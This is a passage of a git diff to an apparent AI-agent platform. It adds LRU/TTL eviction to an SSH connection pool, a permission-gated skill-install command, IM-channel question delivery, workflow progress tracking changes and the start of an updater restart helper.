     Keeps at most one connection per (session_id, host, port, username) tuple.
-    Connections are released when the pool is explicitly closed or when the
-    pool object is garbage-collected.
+    Idle connections are released by LRU/TTL pressure, explicit session close,
+    or process shutdown.
     """
 
-    def __init__(self) -> None:
-        self._connections: dict[tuple[str, str, int, str], asyncssh.SSHClientConnection] = {}
+    def __init__(
+        self,
+        *,
+        max_connections: Optional[int] = None,
+        idle_ttl_s: Optional[float] = None,
+    ) -> None:
+        self.max_connections = (
+            max_connections
+            if max_connections is not None
+            else _env_int(
+                "FLOCKS_SSH_POOL_MAX_CONNECTIONS",
+                DEFAULT_POOL_MAX_CONNECTIONS,
+                1,
+            )
+        )
+        self.idle_ttl_s = (
+            idle_ttl_s
+            if idle_ttl_s is not None
+            else _env_float(
+                "FLOCKS_SSH_POOL_IDLE_TTL_SECONDS",
+                DEFAULT_POOL_IDLE_TTL_S,
+                1.0,
+            )
+        )
+        self._connections: OrderedDict[
+            tuple[str, str, int, str],
+            _PoolEntry,
+        ] = OrderedDict()
         self._locks: dict[tuple[str, str, int, str], asyncio.Lock] = {}
         self._global_lock = asyncio.Lock()
 
@@ -79,7 +143,7 @@ async def get_connection(
         key_path: Optional[str],
         password: Optional[str],
     ) -> asyncssh.SSHClientConnection:
-        """Return an existing connection or create a new one.
+        """Return an existing connection or create a new one and mark it in use.
 
         Stale connections are not proactively detected here — the caller is
         responsible for catching connection errors and calling
@@ -89,13 +153,19 @@ async def get_connection(
         key = self._key(session_id, host, port, username)
 
         async with self._global_lock:
+            self._prune_idle_locked(time.monotonic())
             if key not in self._locks:
                 self._locks[key] = asyncio.Lock()
 
         async with self._locks[key]:
-            conn = self._connections.get(key)
-            if conn is not None:
-                return conn
+            now = time.monotonic()
+            async with self._global_lock:
+                entry = self._connections.get(key)
+                if entry is not None:
+                    entry.in_use += 1
+                    entry.last_used = now
+                    self._connections.move_to_end(key)
+                    return entry.conn
 
             connect_kwargs: dict = dict(
                 host=host,
@@ -111,35 +181,115 @@ async def get_connection(
                 connect_kwargs["password"] = password
 
             conn = await asyncssh.connect(**connect_kwargs)
-            self._connections[key] = conn
+            async with self._global_lock:
+                self._connections[key] = _PoolEntry(
+                    conn=conn,
+                    last_used=time.monotonic(),
+                    in_use=1,
+                )
+                self._connections.move_to_end(key)
+                self._enforce_limits_locked()
             return conn
 
-    def invalidate_connection(
+    async def release_connection(
+        self, session_id: str, host: str, port: int, username: str
+    ) -> None:
+        """Mark a pooled connection as no longer actively executing a command."""
+        key = self._key(session_id, host, port, username)
+        async with self._global_lock:
+            entry = self._connections.get(key)
+            if entry is None:
+                return
+            entry.in_use = max(0, entry.in_use - 1)
+            entry.last_used = time.monotonic()
+            self._connections.move_to_end(key)
+            self._prune_idle_locked(entry.last_used)
+            self._enforce_limits_locked()
+
+    async def invalidate_connection(
         self, session_id: str, host: str, port: int, username: str
     ) -> None:
-        """Evict a stale connection from the pool so the next call reconnects."""
+        """Close and evict a stale connection so the next call reconnects."""
         key = self._key(session_id, host, port, username)
-        self._connections.pop(key, None)
+        async with self._global_lock:
+            entry = self._connections.pop(key, None)
+            self._locks.pop(key, None)
+        if entry is not None:
+            self._close_connection(entry.conn)
 
     async def close_session(self, session_id: str) -> None:
         """Close all connections belonging to *session_id*."""
-        to_close: list[tuple] = [k for k in self._connections if k[0] == session_id]
-        for key in to_close:
-            conn = self._connections.pop(key, None)
-            if conn:
-                try:
-                    conn.close()
-                except Exception:
-                    pass
+        async with self._global_lock:
+            to_close: list[tuple] = [
+                k for k in self._connections if k[0] == session_id
+            ]
+            entries = [self._connections.pop(key) for key in to_close]
+            for key in to_close:
+                self._locks.pop(key, None)
+        for entry in entries:
+            self._close_connection(entry.conn)
 
     async def close_all(self) -> None:
         """Close every cached connection."""
-        for conn in self._connections.values():
-            try:
-                conn.close()
-            except Exception:
-                pass
-        self._connections.clear()
+        async with self._global_lock:
+            entries = list(self._connections.values())
+            self._connections.clear()
+            self._locks.clear()
+        for entry in entries:
+            self._close_connection(entry.conn)
+
+    def _prune_idle_locked(self, now: float) -> None:
+        """Close idle expired connections. Caller must hold ``_global_lock``."""
+        if self.idle_ttl_s <= 0:
+            return
+        expired = [
+            key
+            for key, entry in self._connections.items()
+            if entry.in_use <= 0 and now - entry.last_used >= self.idle_ttl_s
+        ]
+        for key in expired:
+            entry = self._connections.pop(key, None)
+            self._locks.pop(key, None)
+            if entry is not None:
+                self._close_connection(entry.conn)
+
+    def _enforce_limits_locked(self) -> None:
+        """Apply LRU cap to idle connections. Caller must hold ``_global_lock``."""
+        if self.max_connections <= 0:
+            return
+        while len(self._connections) > self.max_connections:
+            evicted_key = None
+            for key, entry in self._connections.items():
+                if entry.in_use <= 0:
+                    evicted_key = key
+                    break
+            if evicted_key is None:
+                # Every connection is active; allow temporary overflow rather
+                # than closing a command that is still running.
+                return
+            entry = self._connections.pop(evicted_key, None)
+            self._locks.pop(evicted_key, None)
+            if entry is not None:
+                self._close_connection(entry.conn)
+
+    def _close_connection(self, conn: asyncssh.SSHClientConnection) -> None:
+        """Best-effort close for asyncssh connections."""
+        try:
+            conn.close()
+        except Exception:
+            pass
+
+    def stats(self) -> dict[str, int | float]:
+        """Return lightweight pool stats for tests and diagnostics."""
+        return {
+            "connections": len(self._connections),
+            "locks": len(self._locks),
+            "active_connections": sum(
+                1 for entry in self._connections.values() if entry.in_use > 0
+            ),
+            "max_connections": self.max_connections,
+            "idle_ttl_s": self.idle_ttl_s,
+        }
 
 
 _pool = SSHConnectionPool()
@@ -209,6 +359,7 @@ async def execute_ssh_command(
         (exit_code, stdout, stderr)
     """
     if session_id:
+        invalidated = False
         conn = await _pool.get_connection(
             session_id=session_id,
             host=host, port=port, username=username,
@@ -226,21 +377,28 @@ async def execute_ssh_command(
             )
         except (asyncssh.ConnectionLost, asyncssh.DisconnectError, BrokenPipeError, OSError):
             # Stale connection — evict from pool and retry with a fresh one.
-            _pool.invalidate_connection(session_id, host, port, username)
+            invalidated = True
+            await _pool.invalidate_connection(session_id, host, port, username)
             conn = await _pool.get_connection(
                 session_id=session_id,
                 host=host, port=port, username=username,
                 key_path=key_path, password=password,
             )
-            result = await asyncio.wait_for(
-                conn.run(command, check=False),
-                timeout=timeout_s,
-            )
-            return (
-                result.exit_status or 0,
-                result.stdout or "",
-                result.stderr or "",
-            )
+            try:
+                result = await asyncio.wait_for(
+                    conn.run(command, check=False),
+                    timeout=timeout_s,
+                )
+                return (
+                    result.exit_status or 0,
+                    result.stdout or "",
+                    result.stderr or "",
+                )
+            finally:
+                await _pool.release_connection(session_id, host, port, username)
+        finally:
+            if not invalidated:
+                await _pool.release_connection(session_id, host, port, username)
 
     connect_kwargs: dict = dict(
         host=host,
diff --git a/flocks/tool/skill/flocks_skills.py b/flocks/tool/skill/flocks_skills.py
index acb8a7fe4..8b577cc60 100644
--- a/flocks/tool/skill/flocks_skills.py
+++ b/flocks/tool/skill/flocks_skills.py
@@ -91,6 +91,30 @@
 _READ_ONLY_SUBCOMMANDS = frozenset({"find", "status"})
 
 
+def _parse_install_args(args: str) -> tuple[Optional[str], str]:
+    tokens = shlex.split(args.strip()) if args.strip() else []
+    source: Optional[str] = None
+    scope = "global"
+    i = 0
+    while i < len(tokens):
+        token = tokens[i]
+        if token == "--scope" and i + 1 < len(tokens):
+            scope = tokens[i + 1]
+            i += 2
+            continue
+        if token.startswith("--scope="):
+            scope = token.split("=", 1)[1]
+            i += 1
+            continue
+        if token in {"--yes", "-y"}:
+            i += 1
+            continue
+        if source is None:
+            source = token
+        i += 1
+    return source, scope
+
+
 def _flocks_executable() -> Optional[str]:
     """Locate the `flocks` CLI on PATH."""
     return shutil.which("flocks")
@@ -141,6 +165,54 @@ async def flocks_skills(
             ),
         )
 
+    if subcommand == "install":
+        source, scope = _parse_install_args(args)
+        if not source:
+            return ToolResult(
+                success=False,
+                error="install requires a source, e.g. github:owner/repo/skill-name",
+            )
+        if scope not in {"global", "project"}:
+            return ToolResult(
+                success=False,
+                error="install --scope must be 'global' or 'project'",
+            )
+        await ctx.ask(
+            permission="bash",
+            patterns=[f"flocks skills install {source} --scope {scope} --yes"],
+            always=["*flocks skills *"],
+            metadata={"subcommand": subcommand},
+        )
+        try:
+            from flocks.skill.installer import SkillInstaller
+
+            result = await SkillInstaller.install_from_source(
+                source,
+                scope=scope,
+                yes=True,
+            )
+        except Exception as exc:
+            return ToolResult(
+                success=False,
+                error=f"Skill install failed: {exc}",
+                title="flocks skills install",
+            )
+        if not result.success:
+            return ToolResult(
+                success=False,
+                error=result.error or result.message or "Skill install failed",
+                title="flocks skills install",
+            )
+        return ToolResult(
+            success=True,
+            output={
+                "message": result.message,
+                "skill_name": result.skill_name,
+                "location": result.location,
+            },
+            title="flocks skills install",
+        )
+
     flocks_bin = _flocks_executable()
     if flocks_bin is None:
         return ToolResult(
diff --git a/flocks/tool/system/question.py b/flocks/tool/system/question.py
index d856fd565..4fb80273e 100644
--- a/flocks/tool/system/question.py
+++ b/flocks/tool/system/question.py
@@ -92,6 +92,136 @@ class QuestionRejectedError(Exception):
 The user's answers will be returned for you to continue with."""
 
 
+_OPTION_LABEL_KEYS = ("label", "text", "title", "name", "value", "id", "key")
+_OPTION_DESCRIPTION_KEYS = ("description", "desc", "subtitle", "detail", "details")
+
+
+def _first_non_empty_string(data: Dict[str, Any], keys: tuple[str, ...]) -> str:
+    for key in keys:
+        value = data.get(key)
+        if value is None:
+            continue
+        text = str(value).strip()
+        if text:
+            return text
+    return ""
+
+
+def normalize_question_option(opt: Any) -> Optional[Dict[str, str]]:
+    """Normalize LLM-produced choice options into the UI's label/description shape."""
+    if isinstance(opt, str):
+        label = opt.strip()
+        return {"label": label, "description": ""} if label else None
+
+    if not isinstance(opt, dict):
+        label = str(opt).strip() if opt is not None else ""
+        return {"label": label, "description": ""} if label else None
+
+    label = _first_non_empty_string(opt, _OPTION_LABEL_KEYS)
+    description = _first_non_empty_string(opt, _OPTION_DESCRIPTION_KEYS)
+    if not label and description:
+        label, description = description, ""
+    if not label:
+        return None
+    return {"label": label, "description": description}
+
+
+def _format_channel_question_text(questions: List[Dict[str, Any]]) -> str:
+    """Render normalized questions as plain text for IM channels."""
+    blocks: list[str] = []
+    for idx, q in enumerate(questions, start=1):
+        header = str(q.get("header") or "").strip()
+        question = str(q.get("question") or "").strip()
+        qtype = str(q.get("type") or "choice")
+        options = q.get("options") or []
+
+        lines: list[str] = []
+        if header:
+            lines.append(header)
+        prefix = f"{idx}. " if len(questions) > 1 else ""
+        lines.append(f"{prefix}{question}")
+
+        if qtype in {"choice", "confirm"} and options:
+            for opt_idx, opt in enumerate(options, start=1):
+                label = str(opt.get("label", "")).strip()
+                description = str(opt.get("description", "") or "").strip()
+                if description:
+                    lines.append(f"{opt_idx}. {label} - {description}")
+                else:
+                    lines.append(f"{opt_idx}. {label}")
+            lines.append("请回复选项序号、选项文本，或直接补充你的答案。")
+        else:
+            lines.append("请直接回复你的答案。")
+
+        blocks.append("\n".join(line for line in lines if line))
+
+    return "\n\n".join(blocks)
+
+
+async def _send_channel_question_if_applicable(
+    ctx: ToolContext,
+    questions: List[Dict[str, Any]],
+) -> ToolResult | None:
+    """Send the question as a plain text IM message for channel sessions.
+
+    Channel sessions do not have the Web UI question-answer transport. Sending
+    a text prompt and returning immediately avoids waiting until timeout.
+    """
+    try:
+        from flocks.channel.inbound.session_binding import SessionBindingService
+        from flocks.channel.outbound.deliver import OutboundDelivery
+        from flocks.channel.base import OutboundContext
+
+        svc = SessionBindingService()
+        bindings = await svc.get_bindings_by_session(ctx.session_id)
+        if not bindings:
+            return None
+
+        text = _format_channel_question_text(questions)
+        for binding in bindings:
+            await OutboundDelivery.deliver(
+                OutboundContext(
+                    channel_id=binding.channel_id,
+                    account_id=binding.account_id,
+                    to=binding.chat_id,
+                    text=text,
+                    thread_id=binding.thread_id,
+                ),
+                session_id=binding.session_id,
+            )
+
+        return ToolResult(
+            success=True,
+            output=(
+                "Question sent to the IM channel as plain text. "
+                "Do not continue the dependent action until the user replies in a new message."
+            ),
+            title="Question sent to channel",
+            metadata={
+                "deferred": True,
+                "channel_session": True,
+                "bindings": [
+                    {
+                        "channel_id": b.channel_id,
+                        "chat_type": b.chat_type.value if b.chat_type else None,
+                        "chat_id": b.chat_id,
+                        "session_id": b.session_id,
+                    }
+                    for b in bindings
+                ],
+            },
+        )
+    except Exception as e:
+        log.warning("question.channel_send_failed", {
+            "session_id": ctx.session_id,
+            "error": str(e),
+        })
+        return ToolResult(
+            success=False,
+            error=f"Failed to send question to channel: {e}",
+        )
+
+
 async def default_question_handler(
     session_id: str,
     questions: List[Dict[str, Any]]
@@ -177,6 +307,13 @@ async def default_question_handler(
                             "type": "boolean",
                             "description": "For 'choice' type: allow selecting multiple options",
                         },
+                        "custom": {
+                            "type": "boolean",
+                            "description": (
+                                "For 'choice' type: allow a custom Other answer option. "
+                                "Defaults to true."
+                            ),
+                        },
                         "placeholder": {
                             "type": "string",
                             "description": "Placeholder/hint text for text, number, password, file inputs",
@@ -241,6 +378,7 @@ async def question_tool(
             "type": q.get("type", "choice"),
             "options": [],
             "multiple": q.get("multiple", False),
+            "custom": q.get("custom", True),
             "placeholder": q.get("placeholder", ""),
             "multiline": q.get("multiline", False),
         }
@@ -256,16 +394,12 @@ async def question_tool(
 
         options = q.get("options", [])
         for opt in options:
-            if isinstance(opt, dict):
-                normalized["options"].append({
-                    "label": str(opt.get("label", "")),
-                    "description": opt.get("description", "")
-                })
-            elif isinstance(opt, str):
-                normalized["options"].append({
-                    "label": opt,
-                    "description": ""
-                })
+            option = normalize_question_option(opt)
+            if option is not None:
+                normalized["options"].append(option)
+
+        if normalized["type"] == "choice" and not normalized["options"]:
+            normalized["type"] = "text"
         
         normalized_questions.append(normalized)
     
@@ -274,6 +408,10 @@ async def question_tool(
             success=False,
             error="No valid questions provided"
         )
+
+    channel_result = await _send_channel_question_if_applicable(ctx, normalized_questions)
+    if channel_result is not None:
+        return channel_result
     
     # Get handler
     handler = _question_handler or default_question_handler
@@ -298,6 +436,21 @@ def format_answer(answer: Optional[List[str]]) -> str:
         ])
         
         output = f"User has answered your questions: {formatted}. You can now continue with the user's answers in mind."
+        try:
+            from flocks.session.goal import GoalManager
+
+            await GoalManager.record_initial_clarification(
+                ctx.session_id,
+                normalized_questions,
+                answers,
+                message_id=ctx.message_id,
+                call_id=ctx.call_id,
+            )
+        except Exception as e:
+            log.warn("question.goal_clarification_record_failed", {
+                "session_id": ctx.session_id,
+                "error": str(e),
+            })
         
         return ToolResult(
             success=True,
diff --git a/flocks/tool/system/session_manage.py b/flocks/tool/system/session_manage.py
index 771a30280..7bf2968d2 100644
--- a/flocks/tool/system/session_manage.py
+++ b/flocks/tool/system/session_manage.py
@@ -25,15 +25,25 @@
 SESSION_MANAGE_ACTIONS = ["list", "get", "create", "update", "delete", "archive"]
 
 SESSION_MANAGE_DESCRIPTION = """\
-管理 Flocks Session 元数据。
+Manage Flocks Session metadata.
+
+Use this tool when the user wants to list, inspect, create, rename, update,
+delete, archive, or restore a Flocks session. Also use it when the user asks to
+change/switch/update the model or provider used by a session.
 
 Use `action` to choose the operation:
-- list: 列出 session；可用 project_id/status/category/limit/offset 过滤或分页
-- get: 获取单个 session；需要 session_id
-- create: 创建 session；可传 title/project_id/directory/agent/parent_id
-- update: 更新 session；需要 session_id，可传 title/agent/model/provider/memory_enabled
-- delete: 软删除 session 及其子 session；需要 session_id，会请求确认
-- archive: 归档或取消归档 session；需要 session_id，archive=false 表示恢复 active
+- list: list sessions; filter or paginate with project_id/status/category/limit/offset.
+  If the target session_id is unknown, call list first.
+- get: get one session; requires session_id.
+- create: create a session; supports title/project_id/directory/agent/parent_id.
+- update: update session metadata; requires session_id. Supports title, agent,
+  model, provider, and memory_enabled. For requests like "change this session to
+  gpt-5" or "update the session model", use action=update with model, and set
+  provider too when the user specifies one.
+- delete: soft-delete a session and its child sessions; requires session_id and
+  confirmation.
+- archive: archive or restore a session; requires session_id. Set archive=false
+  to restore an archived session to active.
 """
 
 
@@ -43,7 +53,10 @@
         type=ParameterType.STRING,
         required=True,
         enum=SESSION_MANAGE_ACTIONS,
-        description="要执行的 session 操作：list/get/create/update/delete/archive",
+        description=(
+            "Session operation: list/get/create/update/delete/archive. Use update "
+            "to change a session's title, agent, model, provider, or memory setting."
+        ),
     ),
     ToolParameter(
         name="session_id",
@@ -99,7 +112,7 @@
         name="agent",
         type=ParameterType.STRING,
         required=False,
-        description="create/update 的 agent 类型",
+        description="Agent type for create/update.",
     ),
     ToolParameter(
         name="parent_id",
@@ -111,13 +124,19 @@
         name="model",
         type=ParameterType.STRING,
         required=False,
-        description="update 的 model ID",
+        description=(
+            "Model ID to set during update, for example when the user asks to "
+            "change/switch/update the model used by a session."
+        ),
     ),
     ToolParameter(
         name="provider",
         type=ParameterType.STRING,
         required=False,
-        description="update 的 provider ID",
+        description=(
+            "Provider ID to set during update, for example openai/anthropic/local. "
+            "Use with model when the target model's provider is specified or known."
+        ),
     ),
     ToolParameter(
         name="memory_enabled",
@@ -140,6 +159,7 @@
     description=SESSION_MANAGE_DESCRIPTION,
     category=ToolCategory.SYSTEM,
     parameters=SESSION_MANAGE_PARAMETERS,
+    native=True,
 )
 async def session_manage(
     ctx: ToolContext,
diff --git a/flocks/tool/task/run_workflow.py b/flocks/tool/task/run_workflow.py
index c4588a89c..4c9c27bdd 100644
--- a/flocks/tool/task/run_workflow.py
+++ b/flocks/tool/task/run_workflow.py
@@ -21,10 +21,13 @@
 from flocks.session.recorder import Recorder
 from flocks.workflow.execution_store import (
     compact_history_for_storage,
+    compact_execution_summary,
     compact_outputs_for_storage,
     compact_step_for_storage,
     create_execution_record,
+    derive_loop_progress,
     normalize_execution_status,
+    record_execution_step,
     record_execution_result,
     resolve_execution_outcome,
     workflow_execution_key,
@@ -34,6 +37,8 @@
 
 log = Log.create(service="tool.run_workflow")
 
+_PROGRESS_FLUSH_EVERY_STEPS = 5
+
 # Lazy import to avoid circular import (flocks.tool <-> flocks.workflow)
 _WORKFLOW_AVAILABLE: Optional[bool] = None
 RequirementsInstaller = None
@@ -499,8 +504,10 @@ async def run_workflow_tool(
     canonical_workflow_id = resolve_workflow_id_from_source(workflow_source)
     display_workflow_id = canonical_workflow_id or workflow_id
     tracked_execution: Optional[Dict[str, Any]] = None
-    tracked_history: list[Dict[str, Any]] = []
+    tracked_step_count = 0
     tracked_exec_key: Optional[str] = None
+    pending_step_index: Optional[int] = None
+    pending_step: Optional[Dict[str, Any]] = None
     loop = asyncio.get_running_loop()
 
     def _emit_metadata(metadata: Dict[str, Any]) -> None:
@@ -510,13 +517,11 @@ def _update_execution_progress(update_fields: Dict[str, Any]) -> None:
         if not tracked_exec_key:
             return
         try:
-            current = asyncio.run_coroutine_threadsafe(
-                Storage.read(tracked_exec_key),
-                loop,
-            ).result(timeout=5)
-            current.update(update_fields)
+            if tracked_execution is None:
+                return
+            tracked_execution.update(update_fields)
             asyncio.run_coroutine_threadsafe(
-                Storage.write(tracked_exec_key, current),
+                Storage.write(tracked_exec_key, compact_execution_summary(tracked_execution)),
                 loop,
             ).result(timeout=5)
         except Exception as exc:
@@ -532,14 +537,32 @@ def _on_step_start(
         node: Any,
         _inputs: Dict[str, Any],
     ) -> int:
+        nonlocal pending_step_index, pending_step
         current_node_id = getattr(node, "id", None)
         current_node_type = getattr(node, "type", None)
-        _update_execution_progress({
-            "currentNodeId": current_node_id,
-            "currentNodeType": current_node_type,
-            "currentPhase": "running",
-            "currentStepIndex": step_index,
-        })
+        loop_progress = derive_loop_progress(
+            node_id=current_node_id,
+            global_step_index=step_index,
+            inputs=_inputs,
+            outputs=None,
+        )
+        pending_step_index = step_index
+        pending_step = {
+            "node_id": current_node_id,
+            "node_type": current_node_type,
+            "inputs": _inputs if isinstance(_inputs, dict) else {},
+            "outputs": {},
+            "error": "Run cancelled before node completed",
+        }
+        if tracked_execution is not None:
+            tracked_execution.update({
+                "currentNodeId": current_node_id,
+                "currentNodeType": current_node_type,
+                "currentPhase": "running",
+                "currentStepIndex": step_index,
+                "loopProgress": loop_progress,
+                "updatedAt": int(time.time() * 1000),
+            })
         _emit_metadata({
             "title": f"Running workflow: {workflow_name}",
             "metadata": {
@@ -553,25 +576,63 @@ def _on_step_start(
                 "current_node_id": current_node_id,
                 "current_node_type": current_node_type,
                 "step_index": step_index,
+                "loop_progress": loop_progress,
             },
         })
         return step_index
 
     def _on_step_complete(step_result: Any) -> None:
+        nonlocal tracked_step_count, pending_step_index, pending_step
         if hasattr(step_result, "model_dump"):
             step_dict = step_result.model_dump(mode="json")
         elif isinstance(step_result, dict):
             step_dict = dict(step_result)
         else:
             step_dict = {"node_id": None, "outputs": {}, "error": str(step_result)}
-        tracked_history.append(compact_step_for_storage(step_dict))
-        _update_execution_progress({
-            "executionLog": list(tracked_history),
-            "currentNodeId": step_dict.get("node_id"),
-            "currentNodeType": step_dict.get("node_type") or step_dict.get("type"),
-            "currentPhase": "running",
-            "currentStepIndex": len(tracked_history),
-        })
+        step_index = tracked_step_count + 1
+        compacted_step = compact_step_for_storage(step_dict)
+        pending_step_index = None
+        pending_step = None
+        loop_progress = derive_loop_progress(
+            node_id=step_dict.get("node_id"),
+            global_step_index=step_index,
+            inputs=step_dict.get("inputs"),
+            outputs=step_dict.get("outputs"),
+        )
+        tracked_step_count = step_index
+        if tracked_execution is not None:
+            tracked_execution.update({
+                "stepCount": tracked_step_count,
+                "currentNodeId": step_dict.get("node_id"),
+                "currentNodeType": step_dict.get("node_type") or step_dict.get("type"),
+                "currentPhase": "running",
+                "currentStepIndex": tracked_step_count,
+                "loopProgress": loop_progress,
+                "updatedAt": int(time.time() * 1000),
+            })
+        if tracked_execution is not None:
+            try:
+                asyncio.run_coroutine_threadsafe(
+                    record_execution_step(tracked_execution["id"], step_index, compacted_step),
+                    loop,
+                ).result(timeout=5)
+            except Exception as exc:
+                log.warning("run_workflow.execution_step.write_failed", {
+                    "workflow_id": display_workflow_id,
+                    "exec_id": tracked_execution["id"],
+                    "step_index": step_index,
+                    "error": str(exc),
+                })
+        if tracked_step_count % _PROGRESS_FLUSH_EVERY_STEPS == 0:
+            _update_execution_progress({
+                "stepCount": tracked_step_count,
+                "currentNodeId": step_dict.get("node_id"),
+                "currentNodeType": step_dict.get("node_type") or step_dict.get("type"),
+                "currentPhase": "running",
+                "currentStepIndex": tracked_step_count,
+                "loopProgress": loop_progress,
+                "updatedAt": int(time.time() * 1000),
+            })
         _emit_metadata({
             "title": f"Running workflow: {workflow_name}",
             "metadata": {
@@ -583,10 +644,33 @@ def _on_step_complete(step_result: Any) -> None:
                 "phase": "running",
                 "current_node_id": step_dict.get("node_id"),
                 "current_node_type": step_dict.get("node_type") or step_dict.get("type"),
-                "step_index": len(tracked_history),
-                "completed_steps": len(tracked_history),
+                "step_index": tracked_step_count,
+                "step_count": tracked_step_count,
+                "loop_progress": loop_progress,
             },
         })
+        return
+
+    async def _flush_pending_step() -> None:
+        if (
+            tracked_execution is None
+            or pending_step_index is None
+            or pending_step is None
+        ):
+            return
+        try:
+            await record_execution_step(
+                tracked_execution["id"],
+                pending_step_index,
+                pending_step,
+            )
+        except Exception as exc:
+            log.warning("run_workflow.pending_step.write_failed", {
+                "workflow_id": display_workflow_id,
+                "exec_id": tracked_execution["id"],
+                "step_index": pending_step_index,
+                "error": str(exc),
+            })
     
     await ctx.ask(
         permission="run_workflow",
@@ -716,8 +800,17 @@ def _on_step_complete(step_result: Any) -> None:
         await _record_workflow_tool_result(display_workflow_id, result_dict)
 
         status_value = normalize_execution_status(status)
+        compacted_history = compact_history_for_storage(result_dict.get("history"))
+        history_count = len(compacted_history)
+        if status_value == "cancelled" and not compacted_history:
+            await _flush_pending_step()
+        final_step_count = result_dict.get("steps")
+        if not isinstance(final_step_count, int):
+            final_step_count = tracked_step_count
+        if pending_step_index is not None:
+            final_step_count = max(final_step_count, pending_step_index)
         if tracked_execution and canonical_workflow_id and tracked_exec_key:
-            current_data = await Storage.read(tracked_exec_key)
+            current_data = dict(tracked_execution)
             outcome_result = result
             if not hasattr(outcome_result, "status"):
                 outcome_result = SimpleNamespace(
@@ -731,11 +824,13 @@ def _on_step_complete(step_result: Any) -> None:
                 "status": status_value,
                 "finishedAt": int(time.time() * 1000),
                 "duration": time.time() - execution_started_at,
-                "executionLog": compact_history_for_storage(result_dict.get("history")) or list(tracked_history),
+                "executionLog": compacted_history,
+                "stepCount": final_step_count,
                 "errorMessage": error_message,
                 "currentNodeId": result_dict.get("last_node_id"),
                 "currentPhase": status_value,
-                "currentStepIndex": result_dict.get("steps", len(tracked_history)),
+                "currentStepIndex": final_step_count,
+                "updatedAt": int(time.time() * 1000),
             })
             await record_execution_result(
                 canonical_workflow_id,
@@ -753,12 +848,13 @@ def _on_step_complete(step_result: Any) -> None:
                     "status": status_value,
                     "phase": status_value,
                     "current_node_id": result_dict.get("last_node_id"),
-                    "step_index": result_dict.get("steps", len(tracked_history)),
+                    "step_index": final_step_count,
+                    "step_count": final_step_count,
+                    "loop_progress": current_data.get("loopProgress"),
                 },
             })
 
         compacted_outputs = compact_outputs_for_storage(result_dict.get("outputs"))
-        compacted_history = compact_history_for_storage(result_dict.get("history"))
 
         # If workflow failed, include error in ToolResult
         if not success and error:
@@ -777,7 +873,8 @@ def _on_step_complete(step_result: Any) -> None:
                     "run_id": result_dict.get("run_id"),
                     "last_node_id": result_dict.get("last_node_id"),
                     "outputs": compacted_outputs,
-                    "history": compacted_history,
+                    "history": [],
+                    "history_count": history_count,
                 }
             )
         
@@ -795,7 +892,8 @@ def _on_step_complete(step_result: Any) -> None:
                 "run_id": result_dict.get("run_id"),
                 "last_node_id": result_dict.get("last_node_id"),
                 "outputs": compacted_outputs,
-                "history": compacted_history,
+                "history": [],
+                "history_count": history_count,
             }
         )
         
@@ -806,14 +904,16 @@ def _on_step_complete(step_result: Any) -> None:
             "error": error_msg,
         })
         if tracked_execution and canonical_workflow_id and tracked_exec_key:
-            current_data = await Storage.read(tracked_exec_key)
+            current_data = dict(tracked_execution)
             current_data.update({
                 "status": "error",
                 "finishedAt": int(time.time() * 1000),
                 "errorMessage": error_msg,
-                "executionLog": compact_history_for_storage(list(tracked_history)),
+                "executionLog": [],
+                "stepCount": tracked_step_count,
                 "currentPhase": "error",
-                "currentStepIndex": len(tracked_history),
+                "currentStepIndex": tracked_step_count,
+                "updatedAt": int(time.time() * 1000),
             })
             await record_execution_result(
                 canonical_workflow_id,
@@ -829,7 +929,7 @@ def _on_step_complete(step_result: Any) -> None:
                     "workflow_execution_id": tracked_execution["id"],
                     "status": "error",
                     "phase": "error",
-                    "step_index": len(tracked_history),
+                    "step_index": tracked_step_count,
                 },
             })
         
diff --git a/flocks/tool/task/schedule_task_center.py b/flocks/tool/task/schedule_task_center.py
index b8d179f4a..ec2a3ab14 100644
--- a/flocks/tool/task/schedule_task_center.py
+++ b/flocks/tool/task/schedule_task_center.py
@@ -129,9 +129,11 @@ def _normalize_schedule_task_create_inputs(
         "Queue-only (use type=queued, no schedule): "
         "'等会', '稍后', '待会', '有空时', '不着急'\n\n"
         "IMPORTANT — IM session resolution before creating:\n"
-        "If the task involves sending a message to an IM platform (企业微信/WeCom、飞书/Feishu、钉钉/DingTalk), "
-        "you MUST resolve the target session_id and channel_type BEFORE calling this tool "
-        "(follow the IM Session Resolution for schedule_task_create protocol in your system prompt). "
+        "If the task involves sending a message to an IM platform "
+        "(企业微信/WeCom、微信/Weixin/WeChat、飞书/Feishu、钉钉/DingTalk), "
+        "you MUST resolve the target session_id and channel_type with im_send_message(resolve_only=true) "
+        "BEFORE calling this tool. "
+        "Use channel_type=wecom for 企业微信 and channel_type=weixin for 微信. "
         "Embed both into description and user_prompt. "
         "If the user cannot provide a session_id, do NOT create the task."
     ),
@@ -148,8 +150,9 @@ def _normalize_schedule_task_create_inputs(
             type=ParameterType.STRING,
             description=(
                 "Detailed task description. "
-                "If the task involves sending a message to an IM platform (WeCom/Feishu/DingTalk), "
+                "If the task involves sending a message to an IM platform (WeCom/Weixin/Feishu/DingTalk), "
                 "MUST include the resolved channel_type and session_id here. "
+                "Use channel_type=wecom for 企业微信 and channel_type=weixin for 微信. "
                 "Example: '每天早上8点向飞书群发送日报 channel_type=feishu session_id=ses_abc123'"
             ),
             required=True,
@@ -257,8 +260,9 @@ def _normalize_schedule_task_create_inputs(
                 "Example — user says: '帮我加个任务，明天上午扫描一下内网资产' "
                 "→ user_prompt should be: '扫描内网资产' "
                 "CRITICAL — IM tasks: If the action involves sending a message to an IM platform "
-                "(WeCom/Feishu/DingTalk), you MUST include the resolved channel_type and session_id "
+                "(WeCom/Weixin/Feishu/DingTalk), you MUST include the resolved channel_type and session_id "
                 "in user_prompt. NEVER omit them — the task runs unattended and cannot ask the user. "
+                "Use channel_type=wecom for 企业微信 and channel_type=weixin for 微信. "
                 "Example — user says: '每天8点发飞书消息给研发群' (session already resolved to ses_abc123) "
                 "→ user_prompt should be: '向飞书(channel_type=feishu) session_id=ses_abc123 发送消息：<消息内容>' "
                 "This text is displayed in the UI as '任务补充信息'."
diff --git a/flocks/updater/restart_handoff.py b/flocks/updater/restart_handoff.py
new file mode 100644
index 000000000..f6350b400
--- /dev/null
+++ b/flocks/updater/restart_handoff.py
@@ -0,0 +1,246 @@
+"""Restart handoff helper for the self-updater.
+
+The updater process owns the backend port while it is spawning the restart
+command. Starting the new backend before that process has fully exited can race
+with port release. This helper is spawned instead; it waits for the old backend
+to exit, clears any remaining backend listener, runs post-apply upgrade tasks,
+and then starts the real restart command.
+"""
+
+from __future__ import annotations
+
+import argparse
+import asyncio
+import shutil
+import subprocess
+import time
+from pathlib import Path
+from typing import Sequence
+
